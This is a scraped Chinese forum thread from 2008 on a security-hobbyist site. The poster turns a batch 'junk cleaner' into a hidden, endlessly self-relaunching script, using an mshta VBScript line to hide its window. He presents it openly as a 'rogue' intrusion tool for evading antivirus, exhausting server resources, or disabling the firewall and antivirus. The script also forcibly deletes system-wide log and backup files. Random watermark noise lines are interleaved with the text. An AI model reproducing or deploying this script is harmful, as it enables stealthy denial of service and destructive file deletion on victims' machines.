标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
[打印本页]
作者:
平湖秋月
时间:
2008-9-13 23:51
标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序 说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!
) |# D' ~7 I$ L! n* G
a.bat源代码如下:
. W+ s6 j* s+ v+ C$ T+ C- ] m
% d; D1 n/ h$ C7 s: M- t3 z p
, y& b& A, \. z& F3 V: O M
===可以直接保存改名a.bat=====================
; V6 d' `! g3 u
@echo off
! k8 J; {" o1 F# u9 c
echo 正在清除系统垃圾文件,请稍等......
& P r$ v/ V, E* S0 R% A/ C) z
@del /f /s /q %systemdrive%\*.tmp
, n8 |0 S$ g0 c
@del /f /s /q %systemdrive%\*._mp
# B% @; L7 d! B0 p. @2 F
@del /f /s /q %systemdrive%\*.log
; R0 ^- V+ d1 v& r. i
@del /f /s /q %systemdrive%\*.gid
- n w* J) ^" i/ n( X4 U
@del /f /s /q %systemdrive%\*.chk
* g5 h' \' L. d9 _% |7 S7 N; G
@del /f /s /q %systemdrive%\*.old
) f' a- ?, U* o$ J7 v4 \
@del /f /s /q %systemdrive%\recycled\*.*
7 }* W6 v0 c7 l7 E7 b3 L/ P
@del /f /s /q %windir%\*.bak
# t1 R- K p9 z) D0 u
@del /f /s /q %windir%\prefetch\*.*
0 V4 ^) y) _, Z4 A& w
@rd /s /q %windir%\temp & md %windir%\temp
% H" }8 y3 l$ c
@del /f /q %userprofile%\cookies\*.*
) f0 Y: r. m$ U" X* P% l4 K
@del /f /q %userprofile%\recent\*.*
2 Q- t$ _8 \" a' C
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
+ \; t% G& J9 Q
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
; O% H/ ]0 h0 a' d h: _, a
@del /f /s /q "%userprofile%\recent\*.*"
$ o5 m/ H- j" l: M8 x/ Y3 A; x4 J" e
echo 清除系统LJ完成!
& q! [% C3 R* ]( G$ Z( C8 z5 ~
其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:
! S* P: I! ]/ D i/ X* }) F3 Q
- R- E% B' ?8 ^2 g. H7 y4 d* }& p
===可以直接保存改名为a.bat
(一定要是a.bat哦具体说明原因你应该明白吧======
/ ]1 r1 ]' c/ |- w( r# D- g. _
@echo off
$ M, z) n8 k# W+ C, ^8 O* j* T6 j; i
if "%1" == "h" goto begin
) `1 l. [( A6 }: l* s, a
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
3 L& M3 i4 H' {) s9 b+ K4 | s' I
:begin
8 { p& y3 {/ k3 y) f7 \& {
echo 正在清除系统垃圾文件,请稍等......
/ j$ b& G4 H9 O
@@del /f /s /q %systemdrive%\*.tmp
( v& Q! Y. v2 j
@del /f /s /q %systemdrive%\*._mp
4 U2 P0 Q; V0 f1 R9 c
@del /f /s /q %systemdrive%\*.log
( q9 a B1 L6 l5 B! x/ s
@del /f /s /q %systemdrive%\*.gid
& w$ f! ?1 ]7 H! n# B1 s4 c$ z
@del /f /s /q %systemdrive%\*.chk
" p6 J3 t( {2 M3 f h" S3 g; w. H Q
@del /f /s /q %systemdrive%\*.old
$ x( u7 U9 i) R4 r
@del /f /s /q %systemdrive%\recycled\*.*
* p3 j. _; s: |6 k: o/ N
@del /f /s /q %windir%\*.bak
; w4 H8 \9 ~1 ~ y9 ]
@del /f /s /q %windir%\prefetch\*.*
) h8 r. j. P) s$ Y \5 I
@rd /s /q %windir%\temp & md %windir%\temp
$ K( S# D; E1 E9 F8 _5 M
@del /f /q %userprofile%\cookies\*.*
: O% P7 ^* \0 g6 A7 N2 J n
@del /f /q %userprofile%\recent\*.*
2 }8 q/ |* w! I4 c
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
3 Z0 B# K' S( _0 V$ g N
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
2 }& e E9 c. M8 m$ \1 o
@del /f /s /q "%userprofile%\recent\*.*"
5 F6 ?: z, C( T
echo 清除系统LJ完成!
% h- q: o: b0 _- D( K
call a.bat
4 J4 F: w5 y: Y B" _; v
运行看看!什么效果?
7 C* t1 W6 c E. J' C! d6 c
对话框消失了!打开任务管理器查看显示CPU运用:100% 看进程里面cmd.exe占用CPU:99 本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
2 Z/ K# Y3 H& J
+ N$ `* R( g/ A' E
你说,我们可以利用这个BAT做些什么:
: i( r, a" B& \6 p4 O, Y' y" P
, Y6 e7 h/ b$ N+ O" @
1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
Q1 H0 n8 ?2 f8 r; D9 B4 _/ M
2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?
3 a) I" |% t& z) l* i% K
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月
作者:
上帝的爱
时间:
2008-9-14 05:03
想法非常不错
作者:
柔肠寸断
时间:
2008-9-14 17:34
打个岔,流氓的应用,呵呵
作者:
柔肠寸断
时间:
2008-9-14 17:38
现在来正经的回答下问题:
0 M) }7 b1 f. [1 B/ A( r9 x+ ^9 W
1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了
+ ^. h, C$ y0 c, P4 y* H0 e) Y, N
+ y; J! X0 A1 k
2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者:
问道小生
时间:
2008-9-14 19:03
其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~
+ g! |9 m q- D
部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者:
平湖秋月
时间:
2008-9-15 21:43
楼上的你们说的都有道理 理论上是成立的 我有时间试试看
欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)
Powered by Discuz! 7.2
